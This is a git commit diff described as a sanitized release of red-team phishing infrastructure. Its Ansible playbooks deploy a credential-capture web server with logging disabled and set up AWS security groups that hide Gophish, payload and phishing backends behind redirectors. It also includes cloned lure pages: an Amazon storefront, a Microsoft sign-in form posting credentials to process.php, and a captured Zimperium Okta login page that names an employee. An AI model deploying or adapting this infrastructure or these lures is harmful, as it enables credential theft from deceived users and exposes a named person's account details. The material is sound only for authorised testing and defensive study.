Initial public portfolio release

Sanitized version of red team infrastructure automation platform.
Operational content (implant pipelines, lures, credential capture)
replaced with documented stubs. Architecture and infrastructure
automation code intact.
This commit is contained in:
Operator
2026-06-23 16:12:14 -04:00
commit 0799bfbae8
239 changed files with 40012 additions and 0 deletions
@@ -0,0 +1,85 @@
---
# Configure phishing web server with landing pages and credential capture
- name: Install required packages
apt:
name:
- nginx
- php-fpm
- php-json
- certbot
- python3-certbot-nginx
state: present
update_cache: yes
- name: Create web directories
file:
path: "{{ item }}"
state: directory
mode: '0755'
owner: www-data
group: www-data
loop:
- /var/www/phishing
- /var/www/phishing/templates
- /var/www/phishing/static
- /var/www/phishing/captures
- /var/private/phishing_creds
- name: Deploy phishing templates
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0644'
owner: www-data
group: www-data
loop:
- { src: "../templates/phishing/phishing-landing-page.j2", dest: "/var/www/phishing/index.html" }
- { src: "../templates/phishing/email-templates/office365_login.j2", dest: "/var/www/phishing/templates/o365.html" }
- { src: "../templates/phishing/email-templates/password_expiry.j2", dest: "/var/www/phishing/templates/password.html" }
- { src: "../templates/phishing/email-templates/security_alert.j2", dest: "/var/www/phishing/templates/security.html" }
- { src: "../templates/phishing/email-templates/file_share.j2", dest: "/var/www/phishing/templates/share.html" }
- name: Deploy credential capture script
template:
src: "../templates/phishing/capture.php.j2"
dest: "/var/www/phishing/capture.php"
mode: '0640'
owner: www-data
group: www-data
- name: Configure NGINX for phishing sites
template:
src: "../templates/phishing/nginx-phishing-webserver.j2"
dest: /etc/nginx/sites-available/phishing
mode: '0644'
- name: Enable phishing site
file:
src: /etc/nginx/sites-available/phishing
dest: /etc/nginx/sites-enabled/phishing
state: link
- name: Remove default nginx site
file:
path: /etc/nginx/sites-enabled/default
state: absent
- name: Configure PHP-FPM for security
lineinfile:
path: /etc/php/7.4/fpm/php.ini
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
loop:
- { regexp: '^expose_php', line: 'expose_php = Off' }
- { regexp: '^display_errors', line: 'display_errors = Off' }
- { regexp: '^log_errors', line: 'log_errors = On' }
- name: Restart services
systemd:
name: "{{ item }}"
state: restarted
enabled: yes
loop:
- nginx
- php7.4-fpm
@@ -0,0 +1,183 @@
---
# Configure security groups and firewall rules for phishing infrastructure
- name: Configure MTA Front security
block:
- name: Create MTA Front security group
amazon.aws.ec2_security_group:
name: "mta-front-{{ deployment_id }}"
description: "Security group for MTA Front server"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# SMTP services - public facing
- proto: tcp
ports: 25
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTP from anywhere"
- proto: tcp
ports: 587
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTP submission"
- proto: tcp
ports: 465
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTPS"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.mta_front | default(false) | bool
- name: Configure Gophish security (hidden backend)
block:
- name: Create Gophish security group
amazon.aws.ec2_security_group:
name: "gophish-{{ deployment_id }}"
description: "Security group for Gophish server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
- proto: tcp
ports: 3333
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "Gophish admin interface"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTP from phishing redirector"
- proto: tcp
ports: 25
cidr_ip: "{{ mta_front_ip }}/32"
rule_desc: "SMTP from MTA front"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.gophish | default(false) | bool
- name: Configure Phishing Redirector security (public facing)
block:
- name: Create Phishing Redirector security group
amazon.aws.ec2_security_group:
name: "phish-redirector-{{ deployment_id }}"
description: "Security group for Phishing Redirector"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Public web access
- proto: tcp
ports: 80
cidr_ip: "0.0.0.0/0"
rule_desc: "HTTP from anywhere"
- proto: tcp
ports: 443
cidr_ip: "0.0.0.0/0"
rule_desc: "HTTPS from anywhere"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.phishing_redirector | default(false) | bool
- name: Configure Phishing Web Server security (hidden backend)
block:
- name: Create Phishing Web Server security group
amazon.aws.ec2_security_group:
name: "phish-webserver-{{ deployment_id }}"
description: "Security group for Phishing Web Server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTP from phishing redirector"
- proto: tcp
ports: 443
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTPS from phishing redirector"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.phishing_webserver | default(false) | bool
- name: Configure Payload Server security (hidden backend)
block:
- name: Create Payload Server security group
amazon.aws.ec2_security_group:
name: "payload-server-{{ deployment_id }}"
description: "Security group for Payload Server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ payload_redirector_ip }}/32"
rule_desc: "HTTP from payload redirector"
- proto: tcp
ports: 443
cidr_ip: "{{ payload_redirector_ip }}/32"
rule_desc: "HTTPS from payload redirector"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.payload_server | default(false) | bool
- name: Display security configuration summary
debug:
msg:
- "Phishing Infrastructure Security Configuration"
- "============================================="
- "✓ Least privilege access implemented"
- "✓ Backend servers hidden from public access"
- "✓ Only redirectors/MTA fronts are publicly accessible"
- "✓ Operator-only SSH access configured"
- "✓ Internal communication secured"
@@ -0,0 +1,40 @@
server {
listen 80;
server_name _;
root /var/www/phishing;
index index.html index.php;
# Disable all logging
access_log off;
error_log /dev/null crit;
# PHP processing
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}
# Credential capture endpoint
location = /capture.php {
limit_except POST { deny all; }
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
}
# Template routing
location /templates/ {
try_files $uri $uri/ =404;
}
# Static resources
location /static/ {
try_files $uri $uri/ =404;
}
# Default
location / {
try_files $uri $uri/ /index.html;
}
}
Binary file not shown.

After

Width:  |  Height:  |  Size: 83 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 37 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 122 KiB

@@ -0,0 +1,238 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Amazon</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<div class="navbar">
<div class="nav-logo border">
<div class="logo"></div>
</div>
<div class="nav-address border">
<p class="add-first">Deliver to</p>
<div class="add-icon">
<i class="fa-solid fa-location-dot"></i>
<p class="add-second">US</p>
</div>
</div>
<div class="nav-search">
<select class="search-select">
<option>All</option>
</select>
<input placeholder="Search Amazon" class="search-input">
<div class="search-icon">
<i class="fa-solid fa-magnifying-glass"></i>
</div>
</div>
<div class="nav-signin border">
<p><span>Hello, sign in</span></p>
<p class="nav-second">Accounts & Lists</p>
</div>
<div class="nav-return border">
<p><span>Returns</span></p>
<p class="nav-second">& Orders</p>
</div>
<div class="nav-cart border">
<i class="fa-solid fa-cart-shopping"></i>
Cart
</div>
</div>
<div class="panel">
<div class="panel-all">
<i class="fa-solid fa-bars"></i>
All
</div>
<div class="panel-options">
<p>Today's Deals</p>
<p>Buy Again</p>
<p>Customer Service</p>
<p>Registry</p>
<p>Gift Cards</p>
<p>Sell</p>
</div>
</div>
</header>
<div class="hero-section">
<div class="hero-msg">
<p>You are on amazon.com. You can also shop on Amazon for millions of products with fast local delivery. <a>Click here to go to amazon.in</a></p>
</div>
</div>
<div class="shop-section">
<div class="box">
<div class="box-content">
<h2>Clothes</h2>
<div class="box-img" style="background-image: url('box1_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Health & Personal Care</h2>
<div class="box-img" style="background-image: url('box2_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Furniture</h2>
<div class="box-img" style="background-image: url('box3_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Electronics</h2>
<div class="box-img" style="background-image: url('box4_image.jpg');"></div>
<p>See more</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Beauty picks</h2>
<div class="box-img" style="background-image: url('box5_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Shop Pet Supplies</h2>
<div class="box-img" style="background-image: url('box6_image.jpg');"></div>
<p>See more</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>New Arrival in Toys</h2>
<div class="box-img" style="background-image: url('box7_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Discover Fashion Trends</h2>
<div class="box-img" style="background-image: url('box8_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Home refresh ideas</h2>
<div class="box-img" style="background-image: url('box9_image.jpg');"></div>
<p>Shop kitchen upgrades</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Create with strip lights</h2>
<div class="box-img" style="background-image: url('box10_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>For your Fitness Needs</h2>
<div class="box-img" style="background-image: url('box11_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Spring new arrivals</h2>
<div class="box-img" style="background-image: url('box12_image.jpg');"></div>
<p>Discover more</p>
</div>
</div>
</div>
<footer>
<div class="foot-panel1">
Back to Top
</div>
<div class="foot-panel2">
<ul>
<p>Get to Know Us</p>
<a>Careers</a>
<a>Blog</a>
<a>About Amazon</a>
<a>Investor Relations</a>
<a>Amazon Devices</a>
<a>Amazon Science</a>
</ul>
<ul>
<p>Make Money with Us</p>
<a>Sell products on Amazon</a>
<a>Sell on Amazon Business</a>
<a>Sell apps on Amazon</a>
<a>Become an Affiliate</a>
<a>Advertise Your Products</a>
<a>Self-Publish with Us</a>
<a>Host an Amazon Hub</a>
<a> See More Make Money with Us</a>
</ul>
<ul>
<p>Amazon Payment Products</p>
<a>Amazon Business Card</a>
<a>Shop with Points</a>
<a>Reload Your Balance</a>
<a>Amazon Currency Converter</a>
</ul>
<ul>
<p>Let Us Help You</p>
<a>Amazon and COVID-19</a>
<a>Your Account</a>
<a>Your Orders</a>
<a>Shipping Rates & Policies</a>
<a>Returns & Replacements</a>
<a>Manage Your Content and Devices</a>
<a>Amazon Assistant</a>
<a>Help</a>
</ul>
</div>
<div class="foot-panel3">
<div class="logo"></div>
</div>
<div class="foot-panel4">
<div class="policies">
<a>Conditions of Use</a>
<a>Privacy Policies</a>
<a>Your Ads Privacy Choices</a>
</div>
<div class="copyright">
© 1996-2023, Amazon.com, Inc. or its affiliates
</div>
</div>
</footer>
</body>
</html>
@@ -0,0 +1,269 @@
* {
margin: 0;
font-family: Arial;
border: border-box;
}
.navbar {
height: 60px;
background-color: #0F1111;
color: white;
display: flex;
align-items: center;
justify-content: space-evenly;
}
.nav-logo {
height: 50px;
width: 110px;
}
.logo {
background-image: url("amazon_logo.png");
background-size: cover;
height: 50px;
width: 100%;
}
.border {
border: 1.5px solid transparent;
}
.border:hover {
border: 1.5px solid white;
}
/* box2 */
.add-first {
color: #CCCCCC;
font-size: 0.85rem;
margin-left: 13px;
}
.add-second {
font-size: 1rem;
margin-left: 1.5px;
}
.add-icon {
display: flex;
align-items: center;
}
/* box3 */
.nav-search {
display: flex;
justify-content: space-evenly;
background-color: pink;
width: 600px;
height: 40px;
border-radius: 4px;
}
.search-select {
background-color: #f3f3f3;
width: 50px;
text-align: center;
border-top-left-radius: 4px;
border-bottom-left-radius: 4px;
border: none;
}
.search-input {
width: 100%;
font-size: 1rem;
border: none;
}
.search-icon {
width: 45px;
display: flex;
justify-content: center;
align-items: center;
font-size: 1.2rem;
background-color: #febd68;
border-top-right-radius: 4px;
border-bottom-right-radius: 4px;
color: #0F1111;
}
/* box4 */
span {
font-size: 0.7rem;
}
.nav-second {
font-size: 0.85rem;
font-weight: 700;
}
/* box6 */
.nav-cart i {
font-size: 28px;
}
.nav-cart {
font-size: 0.85rem;
font-weight: 700;
}
/* panel */
.panel {
height: 40px;
background-color: #222f3d;
display: flex;
color: white;
align-items: center;
justify-content: space-evenly;
}
.panel-all:hover {
border: 1.5px solid white;
}
.panel-options p {
display: inline;
margin-left: 10px;
}
.panel-options {
width: 85%;
font-size: 0.85rem;
}
.panel-options p:hover {
border: 1.5px solid white;
}
/* hero section */
.hero-section {
background-image: url("hero1_image.jpg");
background-size: cover;
height: 350px;
display: flex;
justify-content: center;
align-items: flex-end;
}
.hero-msg {
background-color: white;
color: black;
height: 40px;
display: flex;
align-items: center;
justify-content: center;
font-size: 0.85rem;
width: 80%;
margin-bottom: 25px;
}
.hero-msg a {
color: #007185;
}
/* shop-section */
.shop-section {
display: flex;
flex-wrap: wrap;
justify-content: space-evenly;
background-color: hsl(318, 65%, 90%);
}
.box {
/*border: 2px solid black;*/
border-radius: 5px;
height: 400px;
width: 23%;
background-color: white;
padding: 20px 0px 15px;
margin-top: 15px;
}
.box-img {
height: 300px;
background-size: cover;
margin-top: 1rem;
margin-bottom: 1rem;
}
.box-content {
margin-left: 1rem;
margin-right: 1rem;
}
.box-content p {
color: #007185;
}
.box-content p:hover {
color: #febd68;
}
/* footer */
footer {
margin-top: 15px;
}
.foot-panel1 {
background-color: #37475a;
color: white;
height: 50px;
display: flex;
justify-content: center;
align-items: center;
font-size: 0.85rem;
}
.foot-panel2 {
background-color: #222f3d;
color: white;
height: 500px;
display: flex;
justify-content: space-evenly;
}
.foot-panel2 a:hover {
text-decoration: underline;
}
ul {
margin-top: 20px;
}
ul a {
display: block;
font-size: 0.85rem;
margin-top: 10px;
color: #dddddd;
}
.foot-panel3 {
background-color: #222f3d;
color: white;
border-top: 0.5px solid white;
height: 70px;
display: flex;
justify-content: center;
align-items: center;
}
.logo {
background-image: url("amazon_logo.png");
background-size: cover;
height: 50px;
width: 100px;
}
.foot-panel4 {
background-color: #0F1111;
color: white;
height: 80px;
text-align: center;
font-size: 0.7rem;
}
.policies {
padding-top: 25px;
}
.copyright {
padding-top: 5px;
}
@@ -0,0 +1,109 @@
<!DOCTYPE html>
<html>
<head>
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-image: url('../illustration');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.login-container {
background: white;
width: 380px;
padding: 30px 40px;
box-shadow: 0 2px 6px rgba(0,0,0,0.1);
}
.logo {
text-align: left;
margin-bottom: 20px;
}
h1 {
font-size: 24px;
font-weight: 600;
margin: 20px 0 15px;
}
input[type="text"], input[type="password"] {
width: 100%;
padding: 8px 0;
margin-bottom: 15px;
border: none;
border-bottom: 1px solid #ccc;
font-size: 15px;
outline: none;
}
input:focus {
border-bottom: 1px solid #0067b8;
}
.button-container {
text-align: right;
margin-top: 20px;
}
button {
background-color: #0067b8;
color: white;
border: none;
padding: 8px 24px;
font-size: 14px;
cursor: pointer;
}
.links {
margin-top: 20px;
font-size: 13px;
}
.links a {
color: #0067b8;
text-decoration: none;
}
.footer {
position: fixed;
bottom: 0;
width: 100%;
display: flex;
justify-content: space-between;
padding: 10px 20px;
font-size: 12px;
color: #666;
}
.footer a {
color: #666;
text-decoration: none;
margin-left: 20px;
}
</style>
</head>
<body>
<div class="login-container">
<div class="logo">
<img src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" alt="Microsoft" width="108">
</div>
<h1>Sign in</h1>
<form action="process.php" method="post">
<input type="text" name="email" placeholder="Email, phone, or Skype" required>
<input type="password" name="password" placeholder="Password" required>
<div class="links">
<a href="https://signup.live.com/signup">No account? Create one!</a><br>
<a href="https://account.live.com/password/reset">Can't access your account?</a>
</div>
<div class="button-container">
<button type="submit">Next</button>
</div>
</form>
</div>
<div class="footer">
<div class="terms">
<a href="https://www.microsoft.com/en-us/servicesagreement/default.aspx">Terms of use</a>
<a href="https://www.microsoft.com/en-us/privacy/privacystatement">Privacy & cookies</a>
</div>
</div>
</body>
</html>
@@ -0,0 +1,558 @@
<!DOCTYPE html>
<!--[if IE 7]><html lang="en" class="lt-ie10 lt-ie9 lt-ie8"><![endif]-->
<!--[if IE 8]><html lang="en" class="lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html lang="en" class="lt-ie10"><![endif]-->
<!--[if gt IE 9]><html lang="en"><![endif]-->
<!--[if !IE]><!--><html lang="en"><!--<![endif]-->
<head>
<meta charset="UTF-8">
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.bgStyle {
background-image: none
}
.bgStyleIE8 {
}
.copyright a:focus-visible,
.privacy-policy a:focus-visible {
border-radius: 6px;
outline: rgb(84, 107, 231) solid 1px;
outline-offset: 2px;
text-decoration: none !important;
}
</style><title>Zimperium - Sign In</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">window.cspNonce = 'GbJoEX60HpuEJf6f877zFg';</script><script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-yEQR8oBedCVhw7cfWyk0wwOq6ewbnlhJsgb3G8QwTyJiYpTkYdfUsWK4QU4wjoen" crossorigin="anonymous"></script>
<link href="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/css/okta-sign-in.min.css" type="text/css" rel="stylesheet" integrity="sha384-fxx+LDlIb08xQnHiuttLUvFQjDs5lrUHVoq4eWhpVlSteR2K2q21MbrOCkWfWqqs" crossorigin="anonymous"/>
<link rel="shortcut icon" href="https://ok14static.oktacdn.com/bc/image/fileStoreRecord?id=fs0po5khq8H3piuZ0697" type="image/x-icon"/>
<link href="https://ok14static.oktacdn.com/assets/loginpage/css/loginpage-theme.c8c15f6857642c257bcd94823d968bb1.css" rel="stylesheet" type="text/css"/><link href="/api/internal/brand/theme/style-sheet?touch-point=SIGN_IN_PAGE&v=4baaffe7fc3b9ab0621cd0bb108e6974d398a61160fd4993137adea4c8d147355a9a62dc6d9c6a5560ecd7843236810e" rel="stylesheet" type="text/css">
<style type="text/css">
body {
background-color: #ebebed !important;
}
.auth-container {
background-color: #ffffff !important;
}
.o-form-button-bar .button-primary, .o-form-button-bar .button {
background: #1b365d !important;
border-color: #1b365d !important;
}
</style>
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
var okta = {
locale: 'en',
deployEnv: 'PROD'
};
</script><script nonce="GbJoEX60HpuEJf6f877zFg">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok14static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
window.onerror = function (msg, _url, _lineNo, _colNo, error) {
if (window.console && window.console.error) {
if (error) {
console.error(error);
} else {
console.error(msg);
}
}
// Return true to suppress "Script Error" alerts in IE
return true;
};
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (window.module) module = window.module;</script></head>
<body class="auth okta-container">
<!--[if gte IE 8]>
<![if lte IE 10]>
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.unsupported-browser-banner-wrap {
padding: 20px;
border: 1px solid #ddd;
background-color: #f3fbff;
}
.unsupported-browser-banner-inner {
position: relative;
width: 735px;
margin: 0 auto;
text-align: left;
}
.unsupported-browser-banner-inner .icon {
vertical-align: top;
margin-right: 20px;
display: inline-block;
position: static !important;
}
.unsupported-browser-banner-inner a {
text-decoration: underline;
}
</style><div class="unsupported-browser-banner-wrap">
<div class="unsupported-browser-banner-inner">
<span class="icon icon-16 icon-only warning-16-yellow"></span>You are using an unsupported browser. For the best experience, update to <a href="//help.okta.com/okta_help.htm?type=&locale=en&id=csh-browser-support">a supported browser</a>.</div>
</div>
<![endif]>
<![endif]-->
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->
<!-- hidden form for reposting fromURI for X509 auth -->
<form action="/login/cert" method="post" id="x509_login" name="x509_login" class="hide">
<input type="hidden" id="fromURI" name="fromURI" class="hidden" value="&#x2f;app&#x2f;office365&#x2f;exk1ufbfxuFLJp6y3697&#x2f;sso&#x2f;wsfed&#x2f;passive&#x3f;username&#x3d;Brian.Caldwell&#x25;40Zimperium.com&amp;wa&#x3d;wsignin1.0&amp;wtrealm&#x3d;urn&#x25;3afederation&#x25;3aMicrosoftOnline&amp;wctx&#x3d;"/>
</form>
<div class="content">
<div class="applogin-banner">
<div class="applogin-background"></div>
<div class="applogin-container">
<h1>
<span class="applogin-app-title">
Connecting to</span>
<div class="applogin-app-logo">
<img src="https://ok14static.oktacdn.com/fs/bcg/4/gfs1iitj6mtRHwXoE1d8" alt="Microsoft&#x20;Office&#x20;365" class="logo office365"/></div>
</h1>
<p>Sign in with your account to access Microsoft Office 365</p>
</div>
</div>
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.noscript-msg {
background-color: #fff;
border-color: #ddd #ddd #d8d8d8;
box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
text-align: center;
width: 398px;
min-width: 300px;
margin: 200px auto;
border-radius: 3px;
border-width: 1px;
border-style: solid;
}
.noscript-content {
padding: 42px;
}
.noscript-content h2 {
padding-bottom: 20px;
}
.noscript-content h1 {
padding-bottom: 25px;
}
.noscript-content a {
background: transparent;
box-shadow: none;
display: table-cell;
vertical-align: middle;
width: 314px;
height: 50px;
line-height: 36px;
color: #fff;
background: linear-gradient(#007dc1, #0073b2), #007dc1;
border: 1px solid;
border-color: #004b75;
border-bottom-color: #00456a;
box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
-webkit-border-radius: 3px;
border-radius: 3px;
}
.noscript-content a:hover {
background: #007dc1;
cursor: hand;
text-decoration: none;
}
</style><noscript>
<div id="noscript-msg" class="noscript-msg">
<div class="noscript-content">
<h2>Javascript is required</h2>
<h1>Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.</h1>
<a href="." class="tb--button">Refresh</a>
</div>
</div>
</noscript>
<div id="signin-container"></div>
<div id="okta-sign-in" class="auth-container main-container hide">
<div id="unsupported-onedrive" class="unsupported-message hide">
<h2 class="o-form-head">Your OneDrive version is not supported</h2>
<p>Upgrade now by installing the OneDrive for Business Next Generation Sync Client to login to Okta</p>
<a class="button button-primary tb--button" target="_blank" href="https://support.okta.com/help/articles/Knowledge_Article/Upgrading-to-OneDrive-for-Business-Next-Generation-Sync-Client">
Learn how to upgrade</a>
</div>
<div id="unsupported-cookie" class="unsupported-message hide">
<h2 class="o-form-head">Cookies are required</h2>
<p>Cookies are disabled on your browser. Please enable Cookies and refresh this page.</p>
<a class="button button-primary tb--button" target="_blank" href=".">
Refresh</a>
</div>
</div>
</div>
<div class="footer">
<div class="footer-container clearfix">
<p class="copyright">Powered by <a href="https://www.okta.com/?internal_link=wic_login" class="inline-block notranslate">Okta</a></p>
<p class="privacy-policy"><a href="/privacy" target="_blank" class="inline-block margin-l-10">Privacy Policy</a></p>
</div>
</div>
<script nonce="GbJoEX60HpuEJf6f877zFg" type="text/javascript">function runLoginPage (fn) {var mainScript = document.createElement('script');mainScript.src = 'https://ok14static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.58de3be0c9b511a0fdfd7ea4f69b56fc.js';mainScript.crossOrigin = 'anonymous';mainScript.integrity = 'sha384-cJ4LGViZBmIttMPH+ao2RyPuN5BztKWYWIa4smbm56r1cUhkU/Dr6vTS3UoPbKTI';document.getElementsByTagName('head')[0].appendChild(mainScript);fn && mainScript.addEventListener('load', function () { setTimeout(fn, 1) });}</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
(function(){
var baseUrl = 'https\x3A\x2F\x2Fzimperium.okta.com';
var suppliedRedirectUri = '';
var repost = false;
var stateToken = '';
var fromUri = '\x2Fapp\x2Foffice365\x2Fexk1ufbfxuFLJp6y3697\x2Fsso\x2Fwsfed\x2Fpassive\x3Fusername\x3DBrian.Caldwell\x2540Zimperium.com\x26wa\x3Dwsignin1.0\x26wtrealm\x3Durn\x253afederation\x253aMicrosoftOnline\x26wctx\x3D';
var username = '';
var rememberMe = true;
var smsRecovery = false;
var callRecovery = false;
var emailRecovery = true;
var usernameLabel = 'Username';
var usernameInlineLabel = '';
var passwordLabel = 'Password';
var passwordInlineLabel = '';
var signinLabel = 'Sign\x20In';
var forgotpasswordLabel = 'Forgot\x20password\x3F';
var unlockaccountLabel = 'Unlock\x20account\x3F';
var helpLabel = 'Help';
var orgSupportPhoneNumber = '';
var hideSignOutForMFA = false;
var hideBackToSignInForReset = false;
var footerHelpTitle = 'Need\x20help\x20signing\x20in\x3F';
var recoveryFlowPlaceholder = 'Email\x20or\x20Username';
var signOutUrl = '';
var authScheme = 'OAUTH2';
var hasPasswordlessPolicy = '';
var INVALID_TOKEN_ERROR_CODE = 'errors.E0000011';
var securityImage = true;
var selfServiceUnlock = false;
selfServiceUnlock = true;
var redirectByFormSubmit = false;
var showPasswordRequirementsAsHtmlList = true;
var autoPush = false;
autoPush = true;
var accountChooserDiscoveryUrl = 'https://login.okta.com/discovery/iframe.html';
// In case of custom app login, the uri is already absolute, so we must not attach baseUrl
var redirectUri;
if (isAbsoluteUri(fromUri)) {
redirectUri = fromUri;
} else {
redirectUri = baseUrl + fromUri;
}
var backToSignInLink = '';
var customButtons;
var pivProperties = {};
var customLinks = [];
var factorPageCustomLink = {};
var linkParams;
var proxyIdxResponse;
var stateTokenAllFlows;
var idpDiscovery;
var idpDiscoveryRequestContext;
var showPasswordToggleOnSignInPage = false;
var showIdentifier = false;
var hasSkipIdpFactorVerificationButton = false;
var hasOAuth2ConsentFeature = false;
var consentFunc;
var hasMfaAttestationFeature = false;
hasMfaAttestationFeature = true;
var rememberMyUsernameOnOIE = false;
var engFastpassMultipleAccounts = true;
var registration = false;
var webauthn = true;
var overrideExistingStateToken = false;
var isPersonalOktaOrg = false;
var sameDeviceOVEnrollmentEnabled = false;
var orgSyncToAccountChooserEnabled = true;
var showSessionRevocation = false;
showSessionRevocation = true;
var hcaptcha;
var loginPageConfig = {
fromUri: fromUri,
repost: repost,
redirectUri: redirectUri,
backToSignInLink: backToSignInLink,
isMobileClientLogin: false,
isMobileSSO: false,
disableiPadCheck: false,
enableiPadLoginReload: false,
linkParams: linkParams,
hasChromeOSFeature: false,
showLinkToAppStore: false,
accountChooserDiscoveryUrl: accountChooserDiscoveryUrl,
mfaAttestation: hasMfaAttestationFeature,
isPersonalOktaOrg: isPersonalOktaOrg,
enrollingFactor: '',
stateTokenExpiresAt: '',
stateTokenRefreshWindowMs: '',
orgSyncToAccountChooserEnabled: orgSyncToAccountChooserEnabled,
inactiveTab: {
enabled: false,
elementId: 'inactive-tab-main-div',
